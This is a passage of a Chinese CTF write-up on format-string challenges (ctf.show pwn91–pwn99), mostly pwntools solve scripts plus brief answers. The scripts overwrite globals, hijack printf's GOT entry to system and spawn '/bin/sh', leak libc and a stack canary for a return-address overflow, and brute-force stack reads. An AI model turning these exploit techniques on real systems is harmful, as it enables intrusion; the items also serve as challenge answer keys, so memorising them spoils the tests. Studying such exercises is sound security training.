四、格式化字符串

pwn91

from pwn import *

elf = ELF('../code/pwn')
p = remote('pwn.challenge.ctf.show', 28126)

# Address of the global `daniu`. Hard-coded: the 0x0804xxxx range suggests a
# non-PIE 32-bit binary, so the address is stable across runs (re-check with
# `readelf -s` if the challenge binary is rebuilt).
daniu = 0x804B038

# Our input shows up as printf's 7th stack argument; fmtstr_payload builds the
# %n-family writes that set *daniu = 6 (presumably the value the check wants —
# confirm against the binary).
payload = fmtstr_payload(7, {daniu: 6})
p.sendline(payload)

p.interactive()

pwn92

%s

pwn93

7

pwn94

from pwn import *

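p = remote('pwn.challenge.ctf.show', 28233)
elf = ELF('../code/pwn')

# GOT slot of printf: once it holds system's address, the program's next
# printf(buf) call becomes system(buf).
printf_got = elf.got['printf']

# Stack offset at which our buffer appears among printf's arguments.
offset = 0x6
# Redirect target. Hard-coded; NOTE(review): looks like a PLT stub of a
# non-PIE 32-bit binary — if the binary imports system, `elf.plt['system']`
# is the robust spelling and will not silently break on a rebuilt target.
sys_addr = 0x8048400

# fmtstr_payload's default byte-wise (%hhn) writes set *printf_got = sys_addr.
payload = fmtstr_payload(offset, {printf_got: sys_addr})
p.sendline(payload)

# This input is what the hijacked printf hands to system(). Use a bytes
# literal (Python 3 tube I/O is bytes; a str relies on pwntools' implicit
# encoding and emits a BytesWarning) and keep the explicit NUL so the
# command string ends exactly here.
p.send(b'/bin/sh\x00')

p.interactive()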

pwn95

from pwn import *
from LibcSearcher3 import *

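p = remote('pwn.challenge.ctf.show', 28235)
elf = ELF('../code/pwn')

printf_got = elf.got['printf']

# Stage 1 — leak printf's resolved address. The GOT address sits at the start
# of the buffer and '%6$s' dereferences it (offset 6, as noted for pwn96).
payload = p32(printf_got) + b'%6$s'
p.send(payload)

# Read up to the first 0xf7 byte and take the 4 bytes ending there. This
# assumes the 32-bit libc is mapped at 0xf7xxxxxx — common, not guaranteed;
# with a different mapping this recv blocks or yields garbage. The delimiter
# is a bytes literal on purpose: a str '\xf7' would depend on pwntools'
# auto-encoding heuristic (ISO-8859-1 vs UTF-8) and raise a BytesWarning.
printf_addr = u32(p.recvuntil(b'\xf7')[-4:])

# LibcSearcher identifies the libc from the symbol's low address bits; if
# several libcs match, the one it picks may be wrong and sys_addr will be off.
libc = LibcSearcher('printf', printf_addr)
libcbase = printf_addr - libc.dump('printf')
sys_addr = libcbase + libc.dump('system')

# Stage 2 — point printf's GOT entry at system, then send the command that the
# next printf(buf) will execute. Bytes literal with an explicit terminator.
payload2 = fmtstr_payload(6, {printf_got: sys_addr})
p.sendline(payload2)
p.send(b'/bin/sh\x00')

p.interactive()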

pwn96

偏移为6

pwn97

from pwn import *
from LibcSearcher3 import *

elf = ELF('../code/pwn')
p = remote('pwn.challenge.ctf.show', 28257)

# Position of our buffer among printf's stack arguments for this binary.
offset = 11
# Global the binary tests; hard-coded .bss address (0x0804xxxx suggests a
# non-PIE 32-bit layout — verify with `readelf -s` if the target changes).
check = 0x804B040

# One arbitrary write: *check = 1, built from %n-family specifiers.
payload = fmtstr_payload(offset, {check: 1})
p.sendline(payload)

p.interactive()

pwn98

from pwn import *

p = remote('pwn.challenge.ctf.show', 28174)
elf = ELF('../code/pwn')

# Return target is a symbol inside the binary itself, so no libc leak is needed.
shell = elf.sym['__stack_check']

# Leak the stack canary: drop the banner, then dump stack slot 15 as hex.
# Assumes the reply consists of the hex digits only (int() tolerates
# surrounding whitespace, not extra prompt text) — confirm against the binary.
p.recv()
payload = '%15$x'
p.sendline(payload)
canary = int(p.recv(), 16)

# Overflow layout: 0x28 bytes of buffer, the canary put back intact, 0xc bytes
# (presumably saved registers/ebp — taken from the binary's frame layout),
# then the return address.
payload2 = b''.join([
    b'a' * 0x28,
    p32(canary),
    b'A' * 0xc,
    p32(shell),
])
p.sendline(payload2)

p.interactive()

pwn99

盲打,提示了flag在栈上,那就一个个爆破吧

from pwn import *
# Silence pwntools' per-connection chatter: the probe loop below opens a fresh
# remote for every format-string index.
context.update(log_level='error')
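def leak(payload):
    """Send one format-string probe over a fresh connection and print any leaked word.

    Args:
        payload: the format string to send, e.g. ``'%7$p'``.

    Returns:
        The raw reply line (bytes, trailing newline stripped) when it looks
        like a ``0x...`` pointer dump, otherwise ``None``. Callers that ignore
        the return value behave as before.

    The socket is closed on every path: an out-of-range ``%N$p`` can crash the
    target, and the original version leaked the connection whenever recv
    raised EOFError.
    """
    io = remote('pwn.challenge.ctf.show', 28153)
    try:
        io.recv()                            # discard the prompt/banner
        io.sendline(payload)
        data = io.recvuntil(b'\n', drop=True)
    finally:
        io.close()
    if not data.startswith(b'0x'):
        return None
    # The script targets a 64-bit binary (hence p64): print the raw stack word
    # so flag fragments stored on the stack show up as readable bytes.
    print(p64(int(data, 16)))
    return data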
# Walk the stack one printf argument at a time. The loop has no exit condition
# of its own: stop it (Ctrl-C) once the flag fragments have appeared, or it
# ends when leak() raises after the target crashes on an out-of-range index.
i = 1
while True:
    sleep(0.1)                               # be gentle with the challenge server
    payload = '%' + str(i) + '$p'
    leak(payload)
    i += 1

pwn100